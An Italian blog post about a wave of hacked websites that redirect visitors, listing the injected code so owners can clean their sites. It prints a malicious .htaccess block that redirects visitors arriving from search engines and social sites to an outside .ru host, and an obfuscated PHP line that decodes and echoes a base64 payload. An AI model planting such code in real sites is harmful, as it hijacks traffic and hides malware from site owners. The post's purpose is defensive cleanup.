Siti hackerati che rimandano a Google.nl

In questi giorni molti siti sono stati attaccati da degli hacker, che hanno apportato modifiche ai files, che gli hanno resi irraggiungibili.

L’attacco ha colpito siti su vari server, sia in Italia che all’estero e, come risultato, molte pagine web rimandavano a Google.nl (Nederland).

Ecco le principali modifiche apportate ai file, e che andranno quindi rimosse per ripristinare la situazione.

Codice aggiunto (o sostituito) all’.htaccess:

#c3284d#
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*

(abacho | abizdirectory | about | acoon | alexana | allesklar | allpages | allthesites | alltheuk | alltheweb | altavista | america | amfibi | aol | apollo7 | aport | arcor | ask | atsearch | baidu | bellnet | bestireland | bhanvad | bing | blog | bluewin | botw | brainysearch | bricabrac | browseireland | chapu | claymont | click4choice | clickey | clickz | clush | confex | cyber-content | daffodil | devaro | dmoz | dogpile | ebay | ehow | eniro | entireweb | euroseek | exalead | excite | express | facebook | fastbot | filesearch | findelio | findhow | finditireland | findloo | findwhat | finnalle | finnfirma | fireball | flemiro | flickr | freenet | friendsreunited | galaxy | gasta | gigablast | gimpsy | globalsearchdirectory | goo | google | goto | gulesider | hispavista | hotbot | hotfrog | icq | iesearch | ilse | infoseek | ireland-information | ixquick | jaan | jayde | jobrapido | kataweb | keyweb | kingdomseek | klammeraffe | km | kobala | kompass | kpnvandaag | kvasir | libero | limier | linkedin | live | liveinternet | lookle | lycos | mail | mamma | metabot | metacrawler | metaeureka | mojeek | msn | myspace | netscape | netzindex | nigma | nlsearch | nol9 | oekoportal | openstat | orange | passagen | pocketflier | qp | qq | rambler | rtl | savio | schnellsuche | search | search-belgium | searchers | searchspot | sfr | sharelook | simplyhired | slider | sol | splut | spray | startpagina | startsiden | sucharchiv | suchbiene | suchbot | suchknecht | suchmaschine | suchnase | sympatico | telfort | telia | teoma | terra | the-arena | thisisouryear | thunderstone | tiscali | t-online | topseven | twitter | ukkey | uwe | verygoodsearch | vkontakte | voila | walhello | wanadoo | web | webalta | web-archiv | webcrawler | websuche | westaustraliaonline | wikipedia | wisenut | witch | wolong | ya | yahoo | yandex | yell | yippy | youtube | zoneru)\.(.*)
RewriteRule ^(.*)$ http://buzzique.ru/in.cgi?16 [R=301,L]
#/c3284d#

Codice aggiunto ad uno o più file php del vostro sito:

#c3284d#
echo(gzinflate(base64_decode(“3U5LDoIwFNyTcIfmbdANjS5cKMVLeIFSnu0z0GJ5FeX0gtzCWU0m8xPiP1CNJtLAgj8
DKmB8s3zol95UqPOsDSb16LmcIjHuioruUfcoxmgUOObhLGWT5pmeCcuYJPnSWLoeTiD8
4lNwm4gZI4ilM3QdeatAJw4gfkVNiC1GBX4RdEfWKzDL3BpwSNaxgiOIiVp2K6sruR2oi
/0lzyq5Pa2/”)));
#/c3284d#

Spero di esservi stato utile, e se avete difficoltà nella pulizia delle vostre pagine contattatemi pure.